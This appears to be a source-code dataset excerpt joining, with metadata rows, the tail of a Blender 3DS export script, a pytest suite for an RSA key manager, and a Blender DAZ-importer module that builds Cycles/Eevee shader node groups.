# Make material chunks for all materials used in the meshes:
for mat_and_image in materialDict.values():
object_info.add_subchunk(make_material_chunk(mat_and_image[0], mat_and_image[1]))
# Give all objects a unique ID and build a dictionary from object name to object id:
"""
name_to_id = {}
for ob, data in mesh_objects:
name_to_id[ob.name]= len(name_to_id)
#for ob in empty_objects:
# name_to_id[ob.name]= len(name_to_id)
"""
# Create object chunks for all meshes:
i = 0
for ob, blender_mesh, matrix in mesh_objects:
# create a new object chunk
object_chunk = _3ds_chunk(OBJECT)
# set the object name
object_chunk.add_variable("name", _3ds_string(sane_name(ob.name)))
# make a mesh chunk out of the mesh:
object_chunk.add_subchunk(make_mesh_chunk(blender_mesh, matrix, materialDict))
# ensure the mesh has no over sized arrays
# skip ones that do!, otherwise we cant write since the array size wont
# fit into USHORT.
if object_chunk.validate():
object_info.add_subchunk(object_chunk)
else:
operator.report({'WARNING'}, "Object %r can't be written into a 3DS file")
''' # COMMENTED OUT FOR 2.42 RELEASE!! CRASHES 3DS MAX
# make a kf object node for the object:
kfdata.add_subchunk(make_kf_obj_node(ob, name_to_id))
'''
if not blender_mesh.users:
bpy.data.meshes.remove(blender_mesh)
#blender_mesh.vertices = None
i += i
# Create chunks for all empties:
''' # COMMENTED OUT FOR 2.42 RELEASE!! CRASHES 3DS MAX
for ob in empty_objects:
# Empties only require a kf object node:
kfdata.add_subchunk(make_kf_obj_node(ob, name_to_id))
pass
'''
# Add main object info chunk to primary chunk:
primary.add_subchunk(object_info)
''' # COMMENTED OUT FOR 2.42 RELEASE!! CRASHES 3DS MAX
# Add main keyframe data chunk to primary chunk:
primary.add_subchunk(kfdata)
'''
# At this point, the chunk hierarchy is completely built.
# Check the size:
primary.get_size()
# Open the file for writing:
file = open(filepath, 'wb')
# Recursively write the chunks to file:
primary.write(file)
# Close the file:
file.close()
# Clear name mapping vars, could make locals too
del name_unique[:]
name_mapping.clear()
# Debugging only: report the exporting time:
#Blender.Window.WaitCursor(0)
print("3ds export time: %.2f" % (time.clock() - time1))
# Debugging only: dump the chunk hierarchy:
#primary.dump()
return {'FINISHED'}
| 33.066667 | 119 | 0.637123 | 5,456 | 38,688 | 4.283908 | 0.135814 | 0.018141 | 0.021906 | 0.002225 | 0.313267 | 0.261498 | 0.212467 | 0.16887 | 0.13276 | 0.099816 | 0 | 0.020327 | 0.262459 | 38,688 | 1,169 | 120 | 33.094953 | 0.798801 | 0.220947 | 0 | 0.235507 | 0 | 0 | 0.027229 | 0 | 0 | 0 | 0.011523 | 0.000855 | 0.001812 | 1 | 0.117754 | false | 0 | 0.01087 | 0.036232 | 0.246377 | 0.007246 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7f65013ec486ea2f0ba3e9a87712daece63dea9 | 1,206 | py | Python | tests/test_crypto/test_rsa_manager.py | Zapix/mtpylon | b268a4e2d1bc641cace1962ea68de73c1156e44c | [
"MIT"
] | 9 | 2021-11-10T08:53:51.000Z | 2021-12-15T12:03:44.000Z | tests/test_crypto/test_rsa_manager.py | Zapix/mtpylon | b268a4e2d1bc641cace1962ea68de73c1156e44c | [
"MIT"
] | 123 | 2020-10-22T07:08:20.000Z | 2021-09-29T15:26:22.000Z | tests/test_crypto/test_rsa_manager.py | Zapix/mtpylon | b268a4e2d1bc641cace1962ea68de73c1156e44c | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import pytest
from rsa import PublicKey, PrivateKey # type: ignore
from tests.simple_manager import manager as rsa_manager, key_data_list
@pytest.mark.parametrize(
'key_data',
key_data_list,
ids=lambda x: x.fingerprint
)
def test_contians_fingerprint(key_data):
assert key_data.fingerprint in rsa_manager
@pytest.mark.parametrize(
'key_data',
key_data_list,
ids=lambda x: x.fingerprint
)
def test_get_keypair(key_data):
public = PublicKey.load_pkcs1(key_data.public_str)
private = PrivateKey.load_pkcs1(key_data.private_str)
key_pair = rsa_manager[key_data.fingerprint]
assert key_pair.public == public
assert key_pair.private == private
@pytest.mark.parametrize(
'key_data',
key_data_list,
ids=lambda x: x.public_str
)
def test_check_public_str(key_data):
public = PublicKey.load_pkcs1(key_data.public_str)
public_bytes = public.save_pkcs1()
assert public_bytes in rsa_manager.public_key_list
@pytest.mark.parametrize(
'key_data',
key_data_list,
ids=lambda x: x.fingerprint
)
def test_check_fingerprint_in_list(key_data):
assert key_data.fingerprint in rsa_manager.fingerprint_list
| 24.612245 | 70 | 0.752073 | 175 | 1,206 | 4.857143 | 0.228571 | 0.156471 | 0.064706 | 0.112941 | 0.52 | 0.52 | 0.52 | 0.52 | 0.52 | 0.418824 | 0 | 0.004931 | 0.159204 | 1,206 | 48 | 71 | 25.125 | 0.833333 | 0.028192 | 0 | 0.459459 | 0 | 0 | 0.027374 | 0 | 0 | 0 | 0 | 0 | 0.135135 | 1 | 0.108108 | false | 0 | 0.081081 | 0 | 0.189189 | 0.216216 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7f76915caec7652c58b9705a01e1653a9685be1 | 33,157 | py | Python | cgroup.py | ModdingClass/import_daz-v1.5.0-20200918_custom | e782cbb120156e67409029a96c3e692c07fd5133 | [
"BSD-2-Clause"
] | null | null | null | cgroup.py | ModdingClass/import_daz-v1.5.0-20200918_custom | e782cbb120156e67409029a96c3e692c07fd5133 | [
"BSD-2-Clause"
] | null | null | null | cgroup.py | ModdingClass/import_daz-v1.5.0-20200918_custom | e782cbb120156e67409029a96c3e692c07fd5133 | [
"BSD-2-Clause"
] | null | null | null | # Copyright (c) 2016-2020, Thomas Larsson
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are those
# of the authors and should not be interpreted as representing official policies,
# either expressed or implied, of the FreeBSD Project.
import bpy
from .cycles import CyclesTree
from .pbr import PbrTree
from .material import WHITE
# ---------------------------------------------------------------------
# CyclesGroup
# ---------------------------------------------------------------------
class MaterialGroup:
def __init__(self, node, name, parent, ncols):
self.group = bpy.data.node_groups.new(name, 'ShaderNodeTree')
node.node_tree = self.group
self.nodes = self.group.nodes
self.links = self.group.links
self.inputs = self.addNode("NodeGroupInput", 0)
self.outputs = self.addNode("NodeGroupOutput", ncols)
self.parent = parent
self.ncols = ncols
class CyclesGroup(MaterialGroup, CyclesTree):
def __init__(self, node, name, parent, ncols):
CyclesTree.__init__(self, parent.material)
MaterialGroup.__init__(self, node, name, parent, ncols)
def __repr__(self):
return ("<NodeGroup %s>" % self.group)
# ---------------------------------------------------------------------
# Shell Group
# ---------------------------------------------------------------------
class ShellGroup(MaterialGroup):
def __init__(self, node, name, parent):
MaterialGroup.__init__(self, node, name, parent, 8)
self.group.inputs.new("NodeSocketShader", "Cycles")
self.group.inputs.new("NodeSocketShader", "Eevee")
self.group.inputs.new("NodeSocketVector", "UV")
self.group.outputs.new("NodeSocketShader", "Cycles")
self.group.outputs.new("NodeSocketShader", "Eevee")
def addNodes(self, context, shell):
shell.rna = self.parent.material.rna
self.material = shell
self.texco = self.inputs.outputs["UV"]
self.buildLayer(context)
alpha,tex = self.getColorTex("getChannelCutoutOpacity", "NONE", 1.0)
self.addOutput(alpha, tex, self.getCyclesSocket(), "Cycles")
self.addOutput(alpha, tex, self.getEeveeSocket(), "Eevee")
def addOutput(self, alpha, tex, socket, slot):
mix = self.addNode("ShaderNodeMixShader", 7)
mix.inputs[0].default_value = alpha
if tex:
self.links.new(tex.outputs[0], mix.inputs[0])
self.links.new(self.inputs.outputs[slot], mix.inputs[1])
self.links.new(socket, mix.inputs[2])
self.links.new(mix.outputs[0], self.outputs.inputs[slot])
class ShellCyclesGroup(ShellGroup, CyclesTree):
def __init__(self, node, name, parent):
CyclesTree.__init__(self, parent.material)
ShellGroup.__init__(self, node, name, parent)
class ShellPbrGroup(ShellGroup, PbrTree):
def __init__(self, node, name, parent):
PbrTree.__init__(self, parent.material)
ShellGroup.__init__(self, node, name, parent)
# ---------------------------------------------------------------------
# Fresnel Group
# ---------------------------------------------------------------------
class FresnelGroup(CyclesGroup):
def __init__(self, node, name, parent):
CyclesGroup.__init__(self, node, name, parent, 4)
self.group.inputs.new("NodeSocketFloat", "IOR")
self.group.inputs.new("NodeSocketFloat", "Roughness")
self.group.inputs.new("NodeSocketVector", "Normal")
self.group.outputs.new("NodeSocketFloat", "Fac")
def addNodes(self, args=None):
geo = self.addNode("ShaderNodeNewGeometry", 1)
bump = self.addNode("ShaderNodeBump", 1)
self.links.new(self.inputs.outputs["Normal"], bump.inputs["Normal"])
bump.inputs["Strength"].default_value = 0
mix1 = self.addNode("ShaderNodeMixRGB", 2)
self.links.new(geo.outputs["Backfacing"], mix1.inputs["Fac"])
self.links.new(self.inputs.outputs["IOR"], mix1.inputs[1])
mix1.inputs[2].default_value[0:3] = WHITE
mix2 = self.addNode("ShaderNodeMixRGB", 2)
self.links.new(self.inputs.outputs["Roughness"], mix2.inputs["Fac"])
self.links.new(bump.outputs[0], mix2.inputs[1])
self.links.new(geo.outputs["Incoming"], mix2.inputs[2])
fresnel = self.addNode("ShaderNodeFresnel", 3)
self.links.new(mix1.outputs[0], fresnel.inputs["IOR"])
self.links.new(mix2.outputs[0], fresnel.inputs["Normal"])
self.links.new(fresnel.outputs["Fac"], self.outputs.inputs["Fac"])
# ---------------------------------------------------------------------
# Mix Group. Mixes Cycles and Eevee
# ---------------------------------------------------------------------
class MixGroup(CyclesGroup):
def __init__(self, node, name, parent, ncols):
CyclesGroup.__init__(self, node, name, parent, ncols)
self.group.inputs.new("NodeSocketFloat", "Fac")
self.group.inputs.new("NodeSocketShader", "Cycles")
self.group.inputs.new("NodeSocketShader", "Eevee")
self.group.outputs.new("NodeSocketShader", "Cycles")
self.group.outputs.new("NodeSocketShader", "Eevee")
def addNodes(self, args=None):
self.mix1 = self.addNode("ShaderNodeMixShader", self.ncols-1)
self.mix2 = self.addNode("ShaderNodeMixShader", self.ncols-1)
self.links.new(self.inputs.outputs["Fac"], self.mix1.inputs[0])
self.links.new(self.inputs.outputs["Fac"], self.mix2.inputs[0])
self.links.new(self.inputs.outputs["Cycles"], self.mix1.inputs[1])
self.links.new(self.inputs.outputs["Eevee"], self.mix2.inputs[1])
self.links.new(self.mix1.outputs[0], self.outputs.inputs["Cycles"])
self.links.new(self.mix2.outputs[0], self.outputs.inputs["Eevee"])
# ---------------------------------------------------------------------
# Add Group. Adds to Cycles and Eevee
# ---------------------------------------------------------------------
class AddGroup(CyclesGroup):
def __init__(self, node, name, parent, ncols):
CyclesGroup.__init__(self, node, name, parent, ncols)
self.group.inputs.new("NodeSocketShader", "Cycles")
self.group.inputs.new("NodeSocketShader", "Eevee")
self.group.outputs.new("NodeSocketShader", "Cycles")
self.group.outputs.new("NodeSocketShader", "Eevee")
def addNodes(self, args=None):
self.add1 = self.addNode("ShaderNodeAddShader", 2)
self.add2 = self.addNode("ShaderNodeAddShader", 2)
self.links.new(self.inputs.outputs["Cycles"], self.add1.inputs[0])
self.links.new(self.inputs.outputs["Eevee"], self.add2.inputs[0])
self.links.new(self.add1.outputs[0], self.outputs.inputs["Cycles"])
self.links.new(self.add2.outputs[0], self.outputs.inputs["Eevee"])
# ---------------------------------------------------------------------
# Emission Group
# ---------------------------------------------------------------------
class EmissionGroup(AddGroup):
def __init__(self, node, name, parent):
AddGroup.__init__(self, node, name, parent, 3)
self.group.inputs.new("NodeSocketColor", "Color")
self.group.inputs.new("NodeSocketFloat", "Strength")
def addNodes(self, args=None):
AddGroup.addNodes(self, args)
node = self.addNode("ShaderNodeEmission", 1)
self.links.new(self.inputs.outputs["Color"], node.inputs["Color"])
self.links.new(self.inputs.outputs["Strength"], node.inputs["Strength"])
self.links.new(node.outputs[0], self.add1.inputs[1])
self.links.new(node.outputs[0], self.add2.inputs[1])
class OneSidedGroup(CyclesGroup):
def __init__(self, node, name, parent):
CyclesGroup.__init__(self, node, name, parent, 3)
self.group.inputs.new("NodeSocketShader", "Cycles")
self.group.inputs.new("NodeSocketShader", "Eevee")
self.group.outputs.new("NodeSocketShader", "Cycles")
self.group.outputs.new("NodeSocketShader", "Eevee")
def addNodes(self, args=None):
geo = self.addNode("ShaderNodeNewGeometry", 1)
trans = self.addNode("ShaderNodeBsdfTransparent", 1)
mix1 = self.addNode("ShaderNodeMixShader", 2)
mix2 = self.addNode("ShaderNodeMixShader", 2)
self.links.new(geo.outputs["Backfacing"], mix1.inputs[0])
self.links.new(geo.outputs["Backfacing"], mix2.inputs[0])
self.links.new(self.inputs.outputs["Cycles"], mix1.inputs[1])
self.links.new(self.inputs.outputs["Eevee"], mix2.inputs[1])
self.links.new(trans.outputs[0], mix1.inputs[2])
self.links.new(trans.outputs[0], mix2.inputs[2])
self.links.new(mix1.outputs[0], self.outputs.inputs["Cycles"])
self.links.new(mix1.outputs[0], self.outputs.inputs["Eevee"])
# ---------------------------------------------------------------------
# Diffuse Group
# ---------------------------------------------------------------------
class DiffuseGroup(MixGroup):
def __init__(self, node, name, parent):
MixGroup.__init__(self, node, name, parent, 3)
self.group.inputs.new("NodeSocketColor", "Color")
self.group.inputs.new("NodeSocketFloat", "Roughness")
self.group.inputs.new("NodeSocketVector", "Normal")
def addNodes(self, args=None):
MixGroup.addNodes(self, args)
diffuse = self.addNode("ShaderNodeBsdfDiffuse", 1)
self.links.new(self.inputs.outputs["Color"], diffuse.inputs["Color"])
self.links.new(self.inputs.outputs["Roughness"], diffuse.inputs["Roughness"])
self.links.new(self.inputs.outputs["Normal"], diffuse.inputs["Normal"])
self.links.new(diffuse.outputs[0], self.mix1.inputs[2])
self.links.new(diffuse.outputs[0], self.mix2.inputs[2])
# ---------------------------------------------------------------------
# Glossy Group
# ---------------------------------------------------------------------
class GlossyGroup(MixGroup):
def __init__(self, node, name, parent):
MixGroup.__init__(self, node, name, parent, 3)
self.group.inputs.new("NodeSocketColor", "Color")
self.group.inputs.new("NodeSocketFloat", "Roughness")
self.group.inputs.new("NodeSocketVector", "Normal")
def addNodes(self, args=None):
MixGroup.addNodes(self, args)
glossy = self.addNode("ShaderNodeBsdfGlossy", 1)
self.links.new(self.inputs.outputs["Color"], glossy.inputs["Color"])
self.links.new(self.inputs.outputs["Roughness"], glossy.inputs["Roughness"])
self.links.new(self.inputs.outputs["Normal"], glossy.inputs["Normal"])
self.links.new(glossy.outputs[0], self.mix1.inputs[2])
self.links.new(glossy.outputs[0], self.mix2.inputs[2])
# ---------------------------------------------------------------------
# Refraction Group
# ---------------------------------------------------------------------
class RefractionGroup(MixGroup):
def __init__(self, node, name, parent):
MixGroup.__init__(self, node, name, parent, 4)
self.group.inputs.new("NodeSocketColor", "Refraction Color")
self.group.inputs.new("NodeSocketFloat", "Refraction Roughness")
self.group.inputs.new("NodeSocketFloat", "Refraction IOR")
self.group.inputs.new("NodeSocketFloat", "Fresnel IOR")
self.group.inputs.new("NodeSocketColor", "Glossy Color")
self.group.inputs.new("NodeSocketFloat", "Glossy Roughness")
self.group.inputs.new("NodeSocketVector", "Normal")
def addNodes(self, args=None):
MixGroup.addNodes(self, args)
fresnel = self.addGroup(FresnelGroup, "DAZ Fresnel", 1)
refr = self.addNode("ShaderNodeBsdfRefraction", 1)
glossy = self.addNode("ShaderNodeBsdfGlossy", 1)
self.links.new(self.inputs.outputs["Refraction Color"], refr.inputs["Color"])
self.links.new(self.inputs.outputs["Refraction Roughness"], refr.inputs["Roughness"])
self.links.new(self.inputs.outputs["Refraction IOR"], refr.inputs["IOR"])
self.links.new(self.inputs.outputs["Normal"], refr.inputs["Normal"])
self.links.new(self.inputs.outputs["Glossy Color"], glossy.inputs["Color"])
self.links.new(self.inputs.outputs["Glossy Roughness"], glossy.inputs["Roughness"])
self.links.new(self.inputs.outputs["Normal"], glossy.inputs["Normal"])
self.links.new(self.inputs.outputs["Fresnel IOR"], fresnel.inputs["IOR"])
self.links.new(self.inputs.outputs["Glossy Roughness"], fresnel.inputs["Roughness"])
self.links.new(self.inputs.outputs["Normal"], fresnel.inputs["Normal"])
mix = self.addNode("ShaderNodeMixShader", 2)
self.links.new(fresnel.outputs[0], mix.inputs[0])
self.links.new(refr.outputs[0], mix.inputs[1])
self.links.new(glossy.outputs[0], mix.inputs[2])
self.links.new(mix.outputs[0], self.mix1.inputs[2])
self.links.new(mix.outputs[0], self.mix2.inputs[2])
# ---------------------------------------------------------------------
# Transparent Group
# ---------------------------------------------------------------------
class TransparentGroup(MixGroup):
def __init__(self, node, name, parent):
MixGroup.__init__(self, node, name, parent, 3)
self.group.inputs.new("NodeSocketColor", "Color")
def addNodes(self, args=None):
MixGroup.addNodes(self, args)
trans = self.addNode("ShaderNodeBsdfTransparent", 1)
self.links.new(self.inputs.outputs["Color"], trans.inputs["Color"])
# Flip
self.links.new(self.inputs.outputs["Cycles"], self.mix1.inputs[2])
self.links.new(self.inputs.outputs["Eevee"], self.mix2.inputs[2])
self.links.new(trans.outputs[0], self.mix1.inputs[1])
self.links.new(trans.outputs[0], self.mix2.inputs[1])
# ---------------------------------------------------------------------
# Translucent Group
# ---------------------------------------------------------------------
class TranslucentGroup(MixGroup):
def __init__(self, node, name, parent):
MixGroup.__init__(self, node, name, parent, 3)
self.group.inputs.new("NodeSocketColor", "Color")
self.group.inputs.new("NodeSocketFloat", "Scale")
self.group.inputs.new("NodeSocketVector", "Radius")
self.group.inputs.new("NodeSocketVector", "Normal")
def addNodes(self, args=None):
MixGroup.addNodes(self, args)
trans = self.addNode("ShaderNodeBsdfTranslucent", 1)
self.links.new(self.inputs.outputs["Color"], trans.inputs["Color"])
self.links.new(self.inputs.outputs["Normal"], trans.inputs["Normal"])
gamma = self.addNode("ShaderNodeGamma", 1)
self.links.new(self.inputs.outputs["Color"], gamma.inputs["Color"])
gamma.inputs["Gamma"].default_value = 2.5
sss = self.addNode("ShaderNodeSubsurfaceScattering", 1)
self.links.new(gamma.outputs["Color"], sss.inputs["Color"])
self.links.new(self.inputs.outputs["Scale"], sss.inputs["Scale"])
self.links.new(self.inputs.outputs["Radius"], sss.inputs["Radius"])
self.links.new(self.inputs.outputs["Normal"], sss.inputs["Normal"])
self.links.new(trans.outputs[0], self.mix1.inputs[2])
self.links.new(sss.outputs[0], self.mix2.inputs[2])
# ---------------------------------------------------------------------
# SSS Group
# ---------------------------------------------------------------------
class SSSGroup(MixGroup):
def __init__(self, node, name, parent):
MixGroup.__init__(self, node, name, parent, 3)
self.group.inputs.new("NodeSocketColor", "Color")
self.group.inputs.new("NodeSocketFloat", "Scale")
self.group.inputs.new("NodeSocketVector", "Radius")
self.group.inputs.new("NodeSocketVector", "Normal")
def addNodes(self, args=None):
MixGroup.addNodes(self, args)
sss = self.addNode("ShaderNodeSubsurfaceScattering", 1)
self.links.new(self.inputs.outputs["Color"], sss.inputs["Color"])
self.links.new(self.inputs.outputs["Scale"], sss.inputs["Scale"])
self.links.new(self.inputs.outputs["Radius"], sss.inputs["Radius"])
self.links.new(self.inputs.outputs["Normal"], sss.inputs["Normal"])
self.links.new(sss.outputs[0], self.mix1.inputs[2])
self.links.new(sss.outputs[0], self.mix2.inputs[2])
# ---------------------------------------------------------------------
# Dual Lobe Group
# ---------------------------------------------------------------------
class DualLobeGroup(CyclesGroup):
def __init__(self, node, name, parent):
CyclesGroup.__init__(self, node, name, parent, 4)
self.group.inputs.new("NodeSocketFloat", "Fac")
self.group.inputs.new("NodeSocketShader", "Cycles")
self.group.inputs.new("NodeSocketShader", "Eevee")
self.group.inputs.new("NodeSocketFloat", "Weight")
self.group.inputs.new("NodeSocketFloat", "IOR")
self.group.inputs.new("NodeSocketFloat", "Roughness 1")
self.group.inputs.new("NodeSocketFloat", "Roughness 2")
self.group.inputs.new("NodeSocketVector", "Normal")
self.group.outputs.new("NodeSocketShader", "Cycles")
self.group.outputs.new("NodeSocketShader", "Eevee")
def addNodes(self, args=None):
fresnel1 = self.addFresnel(True)
glossy1 = self.addGlossy("Roughness 1", True)
cycles1 = self.mixGlossy(fresnel1, glossy1, "Cycles")
eevee1 = self.mixGlossy(fresnel1, glossy1, "Eevee")
fresnel2 = self.addFresnel(False)
glossy2 = self.addGlossy("Roughness 2", False)
cycles2 = self.mixGlossy(fresnel2, glossy2, "Cycles")
eevee2 = self.mixGlossy(fresnel2, glossy2, "Eevee")
self.mixOutput(cycles1, cycles2, "Cycles")
self.mixOutput(eevee1, eevee2, "Eevee")
def addFresnel(self, useNormal):
fresnel = self.addNode("ShaderNodeFresnel", 1)
self.links.new(self.inputs.outputs["IOR"], fresnel.inputs["IOR"])
if useNormal:
self.links.new(self.inputs.outputs["Normal"], fresnel.inputs["Normal"])
return fresnel
def addGlossy(self, roughness, useNormal):
glossy = self.addNode("ShaderNodeBsdfGlossy", 1)
self.links.new(self.inputs.outputs["Weight"], glossy.inputs["Color"])
self.links.new(self.inputs.outputs[roughness], glossy.inputs["Roughness"])
if useNormal:
self.links.new(self.inputs.outputs["Normal"], glossy.inputs["Normal"])
return glossy
def mixGlossy(self, fresnel, glossy, slot):
mix = self.addNode("ShaderNodeMixShader", 2)
self.links.new(fresnel.outputs[0], mix.inputs[0])
self.links.new(self.inputs.outputs[slot], mix.inputs[1])
self.links.new(glossy.outputs[0], mix.inputs[2])
return mix
def mixOutput(self, node1, node2, slot):
mix = self.addNode("ShaderNodeMixShader", 3)
self.links.new(self.inputs.outputs["Fac"], mix.inputs[0])
self.links.new(node1.outputs[0], mix.inputs[2])
self.links.new(node2.outputs[0], mix.inputs[1])
self.links.new(mix.outputs[0], self.outputs.inputs[slot])
# ---------------------------------------------------------------------
# Volume Group
# ---------------------------------------------------------------------
class VolumeGroup(CyclesGroup):
def __init__(self, node, name, parent):
CyclesGroup.__init__(self, node, name, parent, 3)
self.group.inputs.new("NodeSocketColor", "Absorbtion Color")
self.group.inputs.new("NodeSocketFloat", "Absorbtion Density")
self.group.inputs.new("NodeSocketColor", "Scatter Color")
self.group.inputs.new("NodeSocketFloat", "Scatter Density")
self.group.inputs.new("NodeSocketFloat", "Scatter Anisotropy")
self.group.outputs.new("NodeSocketShader", "Volume")
def addNodes(self, args=None):
absorb = self.addNode("ShaderNodeVolumeAbsorption", 1)
self.links.new(self.inputs.outputs["Absorbtion Color"], absorb.inputs["Color"])
self.links.new(self.inputs.outputs["Absorbtion Density"], absorb.inputs["Density"])
scatter = self.addNode("ShaderNodeVolumeScatter", 1)
self.links.new(self.inputs.outputs["Scatter Color"], scatter.inputs["Color"])
self.links.new(self.inputs.outputs["Scatter Density"], scatter.inputs["Density"])
self.links.new(self.inputs.outputs["Scatter Anisotropy"], scatter.inputs["Anisotropy"])
volume = self.addNode("ShaderNodeAddShader", 2)
self.links.new(absorb.outputs[0], volume.inputs[0])
self.links.new(scatter.outputs[0], volume.inputs[1])
self.links.new(volume.outputs[0], self.outputs.inputs["Volume"])
# ---------------------------------------------------------------------
# Normal Group
#
# https://blenderartists.org/t/way-faster-normal-map-node-for-realtime-animation-playback-with-tangent-space-normals/1175379
# ---------------------------------------------------------------------
class NormalGroup(CyclesGroup):
def __init__(self, node, name, parent):
CyclesGroup.__init__(self, node, name, parent, 8)
strength = self.group.inputs.new("NodeSocketFloat", "Strength")
strength.default_value = 1.0
strength.min_value = 0.0
strength.max_value = 1.0
color = self.group.inputs.new("NodeSocketColor", "Color")
color.default_value = ((0.5, 0.5, 1.0, 1.0))
self.group.outputs.new("NodeSocketVector", "Normal")
def addNodes(self, args):
# Generate TBN from Bump Node
frame = self.nodes.new("NodeFrame")
frame.label = "Generate TBN from Bump Node"
uvmap = self.addNode("ShaderNodeUVMap", 1, parent=frame)
if args[0]:
uvmap.uv_map = args[0]
uvgrads = self.addNode("ShaderNodeSeparateXYZ", 2, label="UV Gradients", parent=frame)
self.links.new(uvmap.outputs["UV"], uvgrads.inputs[0])
tangent = self.addNode("ShaderNodeBump", 3, label="Tangent", parent=frame)
tangent.invert = True
tangent.inputs["Distance"].default_value = 1
self.links.new(uvgrads.outputs[0], tangent.inputs["Height"])
bitangent = self.addNode("ShaderNodeBump", 3, label="Bi-Tangent", parent=frame)
bitangent.invert = True
bitangent.inputs["Distance"].default_value = 1000
self.links.new(uvgrads.outputs[1], bitangent.inputs["Height"])
geo = self.addNode("ShaderNodeNewGeometry", 3, label="Normal", parent=frame)
# Transpose Matrix
frame = self.nodes.new("NodeFrame")
frame.label = "Transpose Matrix"
sep1 = self.addNode("ShaderNodeSeparateXYZ", 4, parent=frame)
self.links.new(tangent.outputs["Normal"], sep1.inputs[0])
sep2 = self.addNode("ShaderNodeSeparateXYZ", 4, parent=frame)
self.links.new(bitangent.outputs["Normal"], sep2.inputs[0])
sep3 = self.addNode("ShaderNodeSeparateXYZ", 4, parent=frame)
self.links.new(geo.outputs["Normal"], sep3.inputs[0])
comb1 = self.addNode("ShaderNodeCombineXYZ", 5, parent=frame)
self.links.new(sep1.outputs[0], comb1.inputs[0])
self.links.new(sep2.outputs[0], comb1.inputs[1])
self.links.new(sep3.outputs[0], comb1.inputs[2])
comb2 = self.addNode("ShaderNodeCombineXYZ", 5, parent=frame)
self.links.new(sep1.outputs[1], comb2.inputs[0])
self.links.new(sep2.outputs[1], comb2.inputs[1])
self.links.new(sep3.outputs[1], comb2.inputs[2])
comb3 = self.addNode("ShaderNodeCombineXYZ", 5, parent=frame)
self.links.new(sep1.outputs[2], comb3.inputs[0])
self.links.new(sep2.outputs[2], comb3.inputs[1])
self.links.new(sep3.outputs[2], comb3.inputs[2])
# Normal Map Processing
frame = self.nodes.new("NodeFrame")
frame.label = "Normal Map Processing"
rgb = self.addNode("ShaderNodeMixRGB", 3, parent=frame)
self.links.new(self.inputs.outputs["Strength"], rgb.inputs[0])
rgb.inputs[1].default_value = (0.5, 0.5, 1.0, 1.0)
self.links.new(self.inputs.outputs["Color"], rgb.inputs[2])
sub = self.addNode("ShaderNodeVectorMath", 4, parent=frame)
sub.operation = 'SUBTRACT'
self.links.new(rgb.outputs["Color"], sub.inputs[0])
sub.inputs[1].default_value = (0.5, 0.5, 0.5)
add = self.addNode("ShaderNodeVectorMath", 5, parent=frame)
add.operation = 'ADD'
self.links.new(sub.outputs[0], add.inputs[0])
self.links.new(sub.outputs[0], add.inputs[1])
# Matrix * Normal Map
frame = self.nodes.new("NodeFrame")
frame.label = "Matrix * Normal Map"
dot1 = self.addNode("ShaderNodeVectorMath", 6, parent=frame)
dot1.operation = 'DOT_PRODUCT'
self.links.new(comb1.outputs[0], dot1.inputs[0])
self.links.new(add.outputs[0], dot1.inputs[1])
dot2 = self.addNode("ShaderNodeVectorMath", 6, parent=frame)
dot2.operation = 'DOT_PRODUCT'
self.links.new(comb2.outputs[0], dot2.inputs[0])
self.links.new(add.outputs[0], dot2.inputs[1])
dot3 = self.addNode("ShaderNodeVectorMath", 6, parent=frame)
dot3.operation = 'DOT_PRODUCT'
self.links.new(comb3.outputs[0], dot3.inputs[0])
self.links.new(add.outputs[0], dot3.inputs[1])
comb = self.addNode("ShaderNodeCombineXYZ", 7, parent=frame)
self.links.new(dot1.outputs["Value"], comb.inputs[0])
self.links.new(dot2.outputs["Value"], comb.inputs[1])
self.links.new(dot3.outputs["Value"], comb.inputs[2])
self.links.new(comb.outputs[0], self.outputs.inputs["Normal"])
# ---------------------------------------------------------------------
# Displacement Group
# ---------------------------------------------------------------------
class DisplacementGroup(CyclesGroup):
def __init__(self, node, name, parent):
CyclesGroup.__init__(self, node, name, parent, 4)
self.group.inputs.new("NodeSocketFloat", "Texture")
self.group.inputs.new("NodeSocketFloat", "Strength")
self.group.inputs.new("NodeSocketFloat", "Difference")
self.group.inputs.new("NodeSocketFloat", "Min")
self.group.outputs.new("NodeSocketFloat", "Height")
def addNodes(self, args=None):
mult1 = self.addNode("ShaderNodeMath", 1)
mult1.operation = 'MULTIPLY'
self.links.new(self.inputs.outputs["Texture"], mult1.inputs[0])
self.links.new(self.inputs.outputs["Difference"], mult1.inputs[1])
add = self.addNode("ShaderNodeMath", 2)
add.operation = 'ADD'
